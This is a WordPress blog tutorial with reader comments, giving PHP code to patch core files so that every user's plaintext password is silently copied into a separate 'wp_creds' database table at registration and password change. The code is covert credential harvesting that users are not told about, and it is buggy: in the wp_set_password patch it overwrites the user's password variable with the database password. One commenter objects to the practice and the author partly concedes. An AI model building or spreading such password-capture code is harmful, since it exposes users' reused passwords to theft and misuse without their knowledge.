Home Carbon Ads Store Your WordPress Users Raw Password

Store Your WordPress Users Raw Password

wordpress-passwords

WordPress stores MD5 hash values of password. So therefore it is almost impossible to retrieve the raw password of the users. But there is a way to store the raw passwords in different place during user registration and password updating. This is what I am going to show you in this article.

If you are already having a running site with registered users then there is only one way to get users passwords i.e., after implementing the code of this article you need to send a email or display a notification to them to change their passwords. Once they update their passwords you will have the raw passwords.

If you are starting a site then this article is perfect for you. All the raw passwords of your new users will be stored in a different place only for you.

Logic To Capture Raw Passwords

We can change the implementation of wp_update_user, wp_create_user and wp_set_password functions to log the password into a different table in wordpress. wp_update_user and wp_create_user are present in wp-includes/user.php file. wp_set_password is present in wp-includes/pluggable.php file.

WordPress 3.9.2

If you are using WordPress 3.9.2 then just download the modified pluggable.php and user.php files and replace it with original ones.

Other Versions

If you using other versions then also you can try to replace the files with the one I provided. I have tested those files in WordPress 3.9.2 only therefore I am not sure whether it will worl in other versions or not. In case you face problems/errors during creating users, updating password and forgot password, then follow these steps to manually edit the original files:

  1. Go to your wp-includes/pluggable.php file. Find the function body of wp_set_password function. Add this code to the beginning of the function.

        global $wpdb;

        $creds = $wpdb->prefix . "creds";
        $username = DB_USER;
        $password = DB_PASSWORD;
        $hostname = DB_HOST;
        $con=mysqli_connect($hostname,$username,$password);

        $sql_1 = "USE " . DB_NAME . ";";
        mysqli_query($con, $sql_1);

        $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
            userid varchar(50) NOT NULL,
            PRIMARY KEY(userid),
            password varchar(100) NOT NULL
        );"    ;
        mysqli_query($con, $sql_2);
        mysqli_close($con);

        if($wpdb->update($creds, array("password" => $password), array("userid" => $user_id), array("%s"), array("%s")) == false)
        {
            $wpdb->insert($creds, array("password" => $password, "userid" => $user_id), array('%s', '%s'));
        }
  2. Go to your wp-includes/user.php file. Find the function body of wp_update_user function. Inside the function body find the condition if ( ! empty($userdata[‘user_pass’]) ). Inside it in the beginning place this code

            global $wpdb;
            $creds = $wpdb->prefix . "creds";
            $username = DB_USER;
            $password = DB_PASSWORD;
            $hostname = DB_HOST;
            $con=mysqli_connect($hostname,$username,$password);


            if (mysqli_connect_errno()) {
                echo "Failed to connect to MySQL: " . mysqli_connect_error();
                die();
            }

            $sql_1 = "USE " . DB_NAME . ";";
            mysqli_query($con,$sql_1);
       

            $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
                userid varchar(50) NOT NULL,
                PRIMARY KEY(userid),
                password varchar(100) NOT NULL
            );"    ;
            mysqli_query($con, $sql_2);
            mysqli_close($con);

            if($wpdb->update($creds, array("password" => $userdata['user_pass']), array("userid" => $ID), array("%s"), array("%s")) == false)
            {
                $wpdb->insert($creds, array("password" => $userdata['user_pass'], "userid" => $ID), array('%s', '%s'));
            }

    Now find the function body of wp_insert_user function. Inside it find the comment // Hash the password. Below the comment place this line of code

    $original_password = $user_pass;

    Now find this line of code $user = new WP_User( $user_id );. Just before it place this code

    if($original_password)
        {
            global $wpdb;

            $creds = $wpdb->prefix . "creds";
            $username = DB_USER;
            $password = DB_PASSWORD;
            $hostname = DB_HOST;
            $con=mysqli_connect($hostname,$username,$password);

            $sql_1 = "USE " . DB_NAME . ";";
            mysqli_query($con, $sql_1);

            $sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
                userid varchar(50) NOT NULL,
                PRIMARY KEY(userid),
                password varchar(100) NOT NULL
            );"    ;
            mysqli_query($con, $sql_2);
            mysqli_close($con);

            if($wpdb->update($creds, array("password" => $original_password), array("userid" => $user_id), array("%s"), array("%s")) == false)
            {
                $wpdb->insert($creds, array("password" => $original_password, "userid" => $user_id), array('%s', '%s'));
            }
        }

Where to find raw password

Once you have done the file modification successfully. Try to create new users and update password. If you are not getting any error then in your DBMS you will see a new table named as wp_creds storing all user ids and raw passwords.

Narayan Prusty
Creating WordPress Tables and Storing DataStyling JavaScript Alert, Confirm and Prompt Boxes
Comments: 10
  1. 4 years ago

    That is very attention-grabbing, You’re an overly skilled blogger.

    I have joined your feesd and look forwaed to searching foor extra
    of your greqt post. Additionally, I have shared your webszite in my sociaal
    networks

    ReplyCancel
  2. Fenix
    4 years ago

    Hello Narayan,
    I implemented the code and due, but I need a password keeper at the time of creating the account and not in the password update. Can you help me?

    ReplyCancel
  3. 4 years ago

    Great information. Lucky me I recently found your website by chance (stumbleupon).
    I’ve saved as a favorite for later!

    ReplyCancel
  4. 5 years ago

    The above code is working perfect. But I want when a user create then raw password saved in data base, when he update password, forgot password etc. Every time raw password same in that table. I hope this make sense.

    Actually I have 2 websites, my client want now when user register on web1.com one it automatically registered on web2.com.

    I’m getting the password from web1.com and sending all data to web2.com on user create function of wordpress. So that’s why I really need it. Please help me how this will work.
    I just want when ever password update in users table, it also update the $creds table password.

    Thanks in advance

    ReplyCancel
  5. Anon
    6 years ago

    You can’t post articles like this and then put in your bio:

    “Narayan is an expert in Web Development, Intel XDK, WordPress and Web Security

    ReplyCancel
  6. Nikola Nikolov
    6 years ago

    Please don’t do that – ever.

    Why would you store the user’s password in plain text? What if your site gets hacked and their passwords leaked? What if they are like most regular users and use the same password in multiple places(including things like social media and worse – financial websites like PayPal, or some online banking, etc.)?

    You don’t warn your readers that storing raw passwords is a bad idea – you should probably do that.

    Also to point out – modifying core files is never a good idea anyway…

    ReplyCancel
    • Narayan Prusty
      6 years ago

      You’re right Nikola.

      I will add edit the post and put code to encrypt the password.

      Regarding editing core files, there is no other way to store the raw passwords. WordPress has done enough to make sure admins don’t see users raw password.

      ReplyCancel
  7. acrobal
    7 years ago

    The problem comes from wp_set_password function. I tried to test with

    require(‘wp-load.php’ );
    global $wpdb;
    $subscriber = $wpdb->get_results( “SELECT * FROM `wp_usermeta` WHERE `meta_value` LIKE ‘a:1:{s:10:”subscriber”;b:1;}'” );
    foreach($subscriber AS $s) {
    wp_set_password(‘testexample’, $s->user_id);
    }

    to change all passwords for a group and instead testexample I have fcfQTpXG5@ in database.

    Thank you.

    ReplyCancel
    • 7 years ago

      I have tried all the above code it works for me. I would recommend you to do some debugging.

      ReplyCancel
  8. acrobal
    7 years ago

    Thanks nice add, I have a question about I tried it. It’s working well but I have a problem when I use the “forget link to reset password”. When I change password , password store in database is not the same. Thank you very much

    ReplyCancel

Leave a Reply to Narayan Prusty Cancel reply

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four
    spaces will be stripped off, but all other whitespace
    will be preserved.
    
    Markdown is turned off in code blocks:
     [This is not a link](http://example.com)

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see http://daringfireball.net/projects/markdown/syntax

Narayan Prusty

I am a software engineer specialising in Blockchain, DevOps and Go/JavaScript. This is my personal blog where I write about things that I learn and feel interesting to share.

Image7 years ago 10 Comments WordPress
Share this
Related Articles